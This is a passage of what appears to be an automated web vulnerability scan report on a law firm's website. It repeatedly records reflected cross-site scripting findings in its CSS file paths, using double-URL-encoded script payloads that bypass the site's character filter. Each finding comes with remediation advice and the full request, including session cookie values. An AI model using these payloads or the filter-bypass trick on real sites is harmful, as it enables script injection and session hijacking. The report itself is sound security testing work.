HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
